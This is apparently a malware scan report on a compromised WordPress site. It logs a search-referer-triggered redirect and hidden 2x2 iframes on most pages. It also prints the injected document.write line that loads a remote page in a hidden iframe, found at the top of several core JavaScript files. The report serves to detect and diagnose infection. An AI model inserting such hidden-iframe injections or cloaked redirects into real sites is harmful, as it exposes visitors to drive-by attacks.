Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://68deals.com/ (request sent with a search-engine Referer to imitate a visitor arriving from search results) GET / HTTP/1.1 Host: 68deals.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 17:58:29 GMT Location: http://reddeerhotyoga.ca/aeed.html?h=3386839 Server: nginx/1.6.2 Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://68deals.com/ | 200 OK Content-Length: 7000 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 94050 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). In this excerpt the injected line appears ahead of the library's own code: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839></iframe>');
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if( Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839> | ||
http://68deals.com/wp-content/themes/twentyeleven/js/showcase.js?ver=2011-04-28 | 200 OK Content-Length: 473 Content-Type: application/javascript | clean |
http://68deals.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 948 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). In this excerpt the injected line appears ahead of the script's own code: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839></iframe>');
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839> | ||
http://68deals.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20111117 | 200 OK Content-Length: 12662 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). In this excerpt the injected line appears ahead of the script's own code: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839></iframe>');
if ( typeof tb_pathToImage != 'string' ) { var tb_pathToImage = thickboxL10n.loadingAnimation; } if ( typeof tb_closeImage != 'string' ) { var tb_closeImage = thickboxL10n.closeImage; } jQuery(document).ready(function(){ tb_init('a.thickbox, area.thickbox, input.thickbox'); imgLoader = var h = window.innerHeight || self.innerHeight || (de&&de.clientHeight) || document.body.clientHeight; arrayPageSize = [w,h]; return arrayPageSize; } function tb_detectMacXFF() { var userAgent = navigator.userAgent.toLowerCase(); if (userAgent.indexOf('mac') != -1 && userAgent.indexOf('firefox')!=-1) { return true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839> | ||
http://68deals.com/sample-page | 200 OK Content-Length: 7872 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/wp-admin/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 22 Sep 2014 17:58:37 GMT Pragma: no-cache Location: http://68deals.com/wp-login.php?redirect_to=http%3A%2F%2F68deals.com%2Fwp-admin%2F&reauth=1 Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 22 Sep 2014 17:58:37 GMT | clean |
http://68deals.com/wp-login.php?redirect_to=http%3a%2f%2f68deals.com%2fwp-admin%2f&reauth=1 | 406 Not Acceptable Content-Length: 226 Content-Type: text/html | clean |
http://68deals.com/test404page.js | 404 Not Found Content-Length: 5885 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/hello-world | 200 OK Content-Length: 9297 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/author/travelbug | 200 OK Content-Length: 8396 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/author/ | 404 Not Found Content-Length: 5885 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/category/uncategorized | 200 OK Content-Length: 8314 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/category/ | 404 Not Found Content-Length: 5885 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/2012/05 | 200 OK Content-Length: 8116 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/2012/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Sep 2014 17:58:50 GMT Location: http://68deals.com/2012 Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://68deals.com/xmlrpc.php | clean |
http://68deals.com/2012 | 200 OK Content-Length: 8105 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=68deals.com
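Result: This site is not currently listed as suspicious. (A blacklist result only shows that the site had not been flagged at query time; it does not contradict the conditional redirect and hidden iframes recorded in the scan above.)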
Query: http://yandex.com/infected?l10n=en&url=http://68deals.com/
Result: 68deals.com is not infected or malware details are not published yet.